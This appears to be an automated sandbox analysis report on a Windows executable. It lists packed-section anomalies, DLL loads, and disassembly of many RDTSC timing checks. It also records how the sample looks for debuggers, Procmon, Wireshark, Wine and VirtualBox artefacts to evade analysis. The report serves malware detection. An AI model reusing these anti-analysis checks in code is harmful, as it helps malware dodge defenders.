Source: C:\Users\user\Desktop\HrIrtCXI3s.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeSection loaded: kernel.appcore.dllJump to behavior
Source: HrIrtCXI3s.exeStatic file information: File size 4476416 > 1048576
Source: HrIrtCXI3s.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x288a00
Source: HrIrtCXI3s.exeStatic PE information: Raw size of lqffkoae is bigger than: 0x100000 < 0x1b8800

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeUnpacked PE file: 0.2.HrIrtCXI3s.exe.4d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lqffkoae:EW;wsxqcczr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lqffkoae:EW;wsxqcczr:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: HrIrtCXI3s.exeStatic PE information: real checksum: 0x44c8ab should be: 0x453aa9
Source: HrIrtCXI3s.exeStatic PE information: section name:
Source: HrIrtCXI3s.exeStatic PE information: section name: .idata
Source: HrIrtCXI3s.exeStatic PE information: section name:
Source: HrIrtCXI3s.exeStatic PE information: section name: lqffkoae
Source: HrIrtCXI3s.exeStatic PE information: section name: wsxqcczr
Source: HrIrtCXI3s.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_3_01971417 push ss; retn 000Eh0_3_01971512
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_3_01971417 push ss; retn 000Eh0_3_01971512
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_3_0195CC00 push eax; ret 0_3_0195CC01
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_3_0197ACD2 push ebx; ret 0_3_0197AD78
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_3_0197ACD2 push ebx; ret 0_3_0197AD78
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_3_0197ACD2 push ebx; ret 0_3_0197AD78
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_3_0197ACD2 push ebx; ret 0_3_0197AD78
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_3_01971417 push ss; retn 000Eh0_3_01971512
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_3_01971417 push ss; retn 000Eh0_3_01971512
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_3_0195CC00 push eax; ret 0_3_0195CC01
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_3_0197ACD2 push ebx; ret 0_3_0197AD78
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_3_0197ACD2 push ebx; ret 0_3_0197AD78
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_3_0197ACD2 push ebx; ret 0_3_0197AD78
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_3_0197ACD2 push ebx; ret 0_3_0197AD78
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_3_0197ACD2 push ebx; ret 0_3_0197AD78
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_3_0197ACD2 push ebx; ret 0_3_0197AD78
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_3_0197ACD2 push ebx; ret 0_3_0197AD78
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_3_0197ACD2 push ebx; ret 0_3_0197AD78
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_3_0197ACD2 push ebx; ret 0_3_0197AD78
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_3_0197ACD2 push ebx; ret 0_3_0197AD78
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_3_0197ACD2 push ebx; ret 0_3_0197AD78
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_3_0197ACD2 push ebx; ret 0_3_0197AD78
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_3_0197D51B push cs; iretd 0_3_0197D562
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_3_0196E8BC push 400196CBh; retf 0_3_0196E8C1
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_3_0197D563 push cs; retf 000Eh0_3_0197D57A
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_008541D0 push eax; mov dword ptr [esp], edx0_2_008541D5
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_00531430 push eax; mov dword ptr [esp], 00000000h0_2_00531433
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_0058C7F0 push eax; mov dword ptr [esp], 00000000h0_2_0058C743
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_005539A0 push eax; mov dword ptr [esp], 00000000h0_2_005539A3
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_00510AC0 push eax; mov dword ptr [esp], 00000000h0_2_00510AC4
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_00859F40 push dword ptr [eax+04h]; ret 0_2_00859F6F
Source: HrIrtCXI3s.exeStatic PE information: section name: lqffkoae entropy: 7.954980284330732

Boot Survival

barindex
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeWindow searched: window name: RegmonclassJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Source: HrIrtCXI3s.exe, 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
Source: HrIrtCXI3s.exe, 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
Source: HrIrtCXI3s.exe, 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WINDBG.EXE
Source: HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: HrIrtCXI3s.exe, 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D2EA9F second address: D2EAC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBBCAD728Fh 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c jnl 00007FFBBCAD728Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D2EAC3 second address: D2EAF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD95557h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FFBBCD95556h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D2EAF9 second address: D2EAFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D2DB68 second address: D2DB8D instructions: 0x00000000 rdtsc 0x00000002 jc 00007FFBBCD9555Bh 0x00000008 jmp 00007FFBBCD95555h 0x0000000d jbe 00007FFBBCD9554Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D2DCA7 second address: D2DCD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FFBBCAD7298h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push esi 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop esi 0x00000010 pushad 0x00000011 jns 00007FFBBCAD7286h 0x00000017 push esi 0x00000018 pop esi 0x00000019 popad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D2DE31 second address: D2DE37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D2DE37 second address: D2DE3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D2DFB9 second address: D2DFDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FFBBCD9555Fh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D2DFDE second address: D2DFF6 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FFBBCAD7288h 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007FFBBCAD7286h 0x00000010 js 00007FFBBCAD7286h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D30A5D second address: D30A61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D30A61 second address: D30A7D instructions: 0x00000000 rdtsc 0x00000002 jne 00007FFBBCAD7286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFBBCAD7290h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D30AFF second address: D30B0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D30B0C second address: D30B12 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D30B12 second address: D30B5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD95556h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pop edx 0x00000016 popad 0x00000017 mov eax, dword ptr [eax] 0x00000019 push edx 0x0000001a jmp 00007FFBBCD9554Ah 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 je 00007FFBBCD95554h 0x0000002a push eax 0x0000002b push edx 0x0000002c jbe 00007FFBBCD95546h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D30C95 second address: D30CE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 je 00007FFBBCAD7286h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FFBBCAD7288h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b push 00000000h 0x0000002d mov ecx, dword ptr [ebp+122D2B81h] 0x00000033 push 148537A4h 0x00000038 je 00007FFBBCAD72A4h 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D30DFD second address: D30E39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FFBBCD95546h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jo 00007FFBBCD95552h 0x00000015 jns 00007FFBBCD9554Ch 0x0000001b nop 0x0000001c mov dword ptr [ebp+122D19C7h], edi 0x00000022 mov cx, ax 0x00000025 push 00000000h 0x00000027 sub dword ptr [ebp+122D2FBBh], ebx 0x0000002d push 51D264B4h 0x00000032 pushad 0x00000033 push ebx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D30E39 second address: D30E54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FFBBCAD7294h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D30E54 second address: D30F18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xor dword ptr [esp], 51D26434h 0x0000000e mov cl, al 0x00000010 add ecx, 47742F8Fh 0x00000016 push 00000003h 0x00000018 sub edx, dword ptr [ebp+122D2A5Dh] 0x0000001e push 00000000h 0x00000020 jnp 00007FFBBCD9554Eh 0x00000026 push 00000003h 0x00000028 or edi, dword ptr [ebp+122D2AD1h] 0x0000002e mov ecx, eax 0x00000030 call 00007FFBBCD95549h 0x00000035 jbe 00007FFBBCD9555Ch 0x0000003b pushad 0x0000003c jmp 00007FFBBCD95552h 0x00000041 push esi 0x00000042 pop esi 0x00000043 popad 0x00000044 push eax 0x00000045 jnl 00007FFBBCD9555Dh 0x0000004b mov eax, dword ptr [esp+04h] 0x0000004f pushad 0x00000050 jmp 00007FFBBCD9554Eh 0x00000055 jmp 00007FFBBCD95558h 0x0000005a popad 0x0000005b mov eax, dword ptr [eax] 0x0000005d jbe 00007FFBBCD95552h 0x00000063 jbe 00007FFBBCD9554Ch 0x00000069 jnc 00007FFBBCD95546h 0x0000006f mov dword ptr [esp+04h], eax 0x00000073 push eax 0x00000074 push edx 0x00000075 pushad 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D30F18 second address: D30F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D30F1F second address: D30F31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFBBCD9554Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D30F31 second address: D30F7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 call 00007FFBBCAD7299h 0x0000000e mov dword ptr [ebp+122D3195h], edi 0x00000014 pop edx 0x00000015 lea ebx, dword ptr [ebp+12452972h] 0x0000001b sub dx, FF7Ch 0x00000020 xchg eax, ebx 0x00000021 jno 00007FFBBCAD7292h 0x00000027 push eax 0x00000028 pushad 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D50243 second address: D5026D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FFBBCD95553h 0x00000008 pop esi 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c jmp 00007FFBBCD9554Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D50569 second address: D5056F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D5056F second address: D5058D instructions: 0x00000000 rdtsc 0x00000002 jg 00007FFBBCD95546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFBBCD95550h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D506D2 second address: D506D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D506D8 second address: D506E2 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FFBBCD95546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D506E2 second address: D506FA instructions: 0x00000000 rdtsc 0x00000002 jc 00007FFBBCAD7292h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D506FA second address: D5070F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBBCD95551h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D509AC second address: D509B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D509B2 second address: D509C1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jo 00007FFBBCD95546h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D50B21 second address: D50B53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jng 00007FFBBCAD729Ch 0x0000000d jmp 00007FFBBCAD7296h 0x00000012 pop ecx 0x00000013 jp 00007FFBBCAD72B2h 0x00000019 push eax 0x0000001a push edx 0x0000001b jnl 00007FFBBCAD7286h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D50B53 second address: D50B65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD9554Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D50B65 second address: D50B72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D5112B second address: D51139 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD9554Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D51139 second address: D5116A instructions: 0x00000000 rdtsc 0x00000002 ja 00007FFBBCAD728Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FFBBCAD728Eh 0x00000012 push edx 0x00000013 pop edx 0x00000014 jmp 00007FFBBCAD7292h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D45117 second address: D4511B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D5129D second address: D512A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D512A3 second address: D512B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD95551h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D512B8 second address: D512E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jne 00007FFBBCAD7295h 0x0000000f jmp 00007FFBBCAD728Fh 0x00000014 push eax 0x00000015 push edx 0x00000016 jc 00007FFBBCAD7286h 0x0000001c push eax 0x0000001d pop eax 0x0000001e rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D518F5 second address: D518FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D518FD second address: D51902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D51902 second address: D51934 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jbe 00007FFBBCD95546h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FFBBCD9554Eh 0x0000001b jo 00007FFBBCD9554Eh 0x00000021 pushad 0x00000022 popad 0x00000023 jng 00007FFBBCD95546h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D51D3B second address: D51D70 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FFBBCAD7299h 0x00000008 jmp 00007FFBBCAD728Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jne 00007FFBBCAD7286h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D51D70 second address: D51D96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD9554Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FFBBCD95555h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D58FCC second address: D58FE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD7292h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D58FE9 second address: D58FED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D579E5 second address: D579EF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D591A5 second address: D591A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D591A9 second address: D591BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFBBCAD728Dh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D5E65F second address: D5E66C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FFBBCD95552h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D5E66C second address: D5E68E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FFBBCAD7286h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFBBCAD7296h 0x00000011 rdtsc
